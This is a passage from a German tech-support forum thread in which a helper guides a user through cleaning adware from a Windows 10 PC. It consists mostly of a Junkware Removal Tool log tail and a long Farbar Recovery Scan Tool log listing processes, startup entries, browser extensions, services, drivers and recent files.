Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\user.js (File)
Successfully deleted: C:\WINDOWS\prefetch\ENERGYOPTIMIZER.EXE-6E63F9A6.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\FREEYOUTUBETOMP3CONVERTER.EXE-B9007EC6.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\PERFORMANCEOPTIMIZER.EXE-7CC04A16.pf (File)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 19.04.2016 at 16:14:45,38
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Noch ne Frage, hab derzeit kein Antivirus Programm am laufen. Was empfiehlst du mir und welchen Browser sollte ich am besten nutzen ?

cosinus 19.04.2016 15:35
Was hast du an dem Satz in meinem Posting #5 nicht verstanden?? :wtf:
Hinweise/Tipps gibt es wenn wir hier komplett fertig sind.


Dann zeig mal frische FRST Logs. Haken setzen bei addition.txt dann auf Untersuchen klicken

http://www.trojaner-board.de/picture...&pictureid=611

StOony 19.04.2016 17:03
Tut mir leid für die Frage :balla:

Weiter im Kontext..

FRST

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:18-04-2016
durchgeführt von Harun (Administrator) auf HARUN-PC (19-04-2016 18:00:37)
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Platform: Windows 10 Pro (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneVideo_3.6.19761.0_x64__8wekyb3d8bbwe\Video.UI.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-07-29] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe [5006536 2016-04-04] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [iTunesHelper] => A:\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2072928 2014-10-31] (Wondershare)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirnx.exe [186640 2016-04-14] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [PlaysTV] => C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe [71440 2016-04-05] (Plays.tv, LLC)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-04-05] (Raptr, Inc)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Steam] => "A:\Steam\steam.exe" -silent
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify Web Helper] => C:\Users\Harun\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [BingSvc] => C:\Users\Harun\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify] => C:\Users\Harun\AppData\Roaming\Spotify\Spotify.exe [6805616 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8813784 2016-03-11] (Piriform Ltd)
IFEO\playstv_launcher.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\raptrstub.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
Startup: C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xfire2.bat [2016-04-10] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{f44a65a3-dc5f-4cc2-bb7a-f4d941196cd5}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\ssv.dll [2015-07-29] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\jp2ssv.dll [2015-07-29] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF SearchEngineOrder.3: Bing
FF Keyword.URL: hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q=
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\dtplugin\npDeployJava1.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\plugin2\npjp2.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin HKU\S-1-5-21-2630849102-760198568-3561441068-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Harun\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS)
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com [nicht gefunden]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\firefox@browser-security.de.xpi [nicht gefunden]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\abs@avira.com [2015-10-26] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\bingsearch.full@microsoft.com [2016-04-19] [ist nicht signiert]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\abs@avira.com [2016-03-08] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\bingsearch.full@microsoft.com [2016-04-19] [ist nicht signiert]

Chrome:
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=de-de
CHR StartupUrls: Default -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-08]
CHR Extension: (Adblock für Youtube™) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2016-03-05]
CHR Extension: (Google-Suche) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26]
CHR Extension: (Google Docs Offline) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (AdBlock) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-04-15]
CHR Extension: (Sniper Team Game Collection) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\hclgbbaloijjnkpigapgmocdpoblnlec [2016-02-07]
CHR Extension: (Top Eleven) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljphpjlafmmdmegmfbkacafhbegjfkkn [2015-07-29]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Google Mail) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-29]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S4 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2016-04-03] (Advanced Micro Devices) [Datei ist nicht signiert]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1074448 2016-04-14] (AVG Technologies CZ, s.r.o.)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
S4 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S4 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26680 2016-02-18] (Hewlett-Packard Company)
S4 Origin Client Service; A:\Origin\OriginClientService.exe [2007048 2015-08-01] (Electronic Arts)
S4 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-04-05] (Plays.tv, LLC)
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [76152 2015-08-01] ()
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76152 2015-08-02] ()
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [4584208 2016-03-29] (AVG Technologies CZ, s.r.o.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [296648 2016-04-04] (Advanced Micro Devices)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-28] (Advanced Micro Devices, Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [111120 2016-03-01] (Advanced Micro Devices)
S3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [194320 2016-04-12] (Intel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-03-29] (AVG Netherlands B.V.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [35880 2016-01-01] (Wellbia.com Co., Ltd.)
U3 idsvc; kein ImagePath
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; kein ImagePath
S3 XFDriver64; \??\C:\Program Files (x86)\Xfire2\XFDriver64.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-19 17:59 - 2016-04-19 17:59 - 00016148 _____ C:\WINDOWS\system32\HARUN-PC_Harun_HistoryPrediction.bin
2016-04-19 16:14 - 2016-04-19 16:14 - 00002273 _____ C:\Users\Harun\Desktop\JRT.txt
2016-04-19 16:06 - 2016-04-19 16:13 - 01610352 _____ (Malwarebytes) C:\Users\Harun\Downloads\JRT.exe
2016-04-19 16:03 - 2016-04-19 16:03 - 03683904 _____ C:\Users\Harun\Downloads\AdwCleaner_5.112 (1).exe
2016-04-19 15:33 - 2016-04-19 16:11 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-04-19 15:33 - 2016-04-19 15:47 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-04-19 15:33 - 2016-04-19 15:33 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-04-19 15:32 - 2016-04-19 15:57 - 00000000 ____D C:\Users\Harun\Desktop\mbar
2016-04-19 15:32 - 2016-04-19 15:47 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-04-19 13:09 - 2016-04-19 13:09 - 00026993 _____ C:\Users\Harun\Downloads\Logfiles.zip
2016-04-19 13:06 - 2016-04-19 13:06 - 00042195 _____ C:\Users\Harun\Downloads\Addition.txt
2016-04-19 13:05 - 2016-04-19 18:00 - 00015239 _____ C:\Users\Harun\Downloads\FRST.txt
2016-04-19 13:05 - 2016-04-19 18:00 - 00000000 ____D C:\FRST
2016-04-19 13:04 - 2016-04-19 13:05 - 02375680 _____ (Farbar) C:\Users\Harun\Downloads\FRST64.exe
2016-04-19 12:54 - 2016-04-19 12:54 - 00083140 _____ C:\Users\Harun\Downloads\Ereignisse.txt
2016-04-19 12:47 - 2016-04-19 12:47 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Harun\Downloads\Nicht bestätigt 326517.crdownload
2016-04-19 12:39 - 2016-04-19 16:11 - 00000000 ____D C:\AdwCleaner
2016-04-19 12:39 - 2016-04-19 12:39 - 03683904 _____ C:\Users\Harun\Downloads\adwcleaner_5.112.exe
2016-04-19 12:39 - 2016-04-19 12:39 - 00001391 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files\iPod
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-04-15 17:10 - 2016-03-29 08:40 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-04-15 17:10 - 2016-03-29 08:40 - 01381376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-04-15 17:10 - 2016-03-25 09:38 - 24593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-04-15 17:10 - 2016-03-25 09:25 - 12505600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-04-15 17:10 - 2016-03-25 09:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-04-15 17:10 - 2016-03-25 09:13 - 19325440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-04-15 17:10 - 2016-03-25 08:55 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-04-15 17:10 - 2016-03-25 08:54 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 03467784 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 01022664 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-04-15 17:10 - 2016-03-16 06:56 - 00861512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01299032 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-04-15 17:10 - 2016-03-16 06:55 - 01127024 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 00601344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-04-15 17:10 - 2016-03-16 06:54 - 00595016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 22610328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 00801632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:46 - 00658568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-04-15 17:10 - 2016-03-16 06:45 - 00140536 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00208736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:39 - 00983904 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-04-15 17:10 - 2016-03-16 06:37 - 01010016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-04-15 17:10 - 2016-03-16 06:21 - 01767000 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:21 - 01531888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 21088728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 00700256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:08 - 00151552 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-04-15 17:10 - 2016-03-16 06:06 - 00181088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:05 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:03 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-04-15 17:10 - 2016-03-16 06:03 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-04-15 17:10 - 2016-03-16 06:00 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModelShim.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00183296 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 01416192 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 00850432 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00511488 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:46 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:44 - 01016832 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 02180608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 01290240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-04-15 17:10 - 2016-03-16 05:41 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00931840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00280576 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
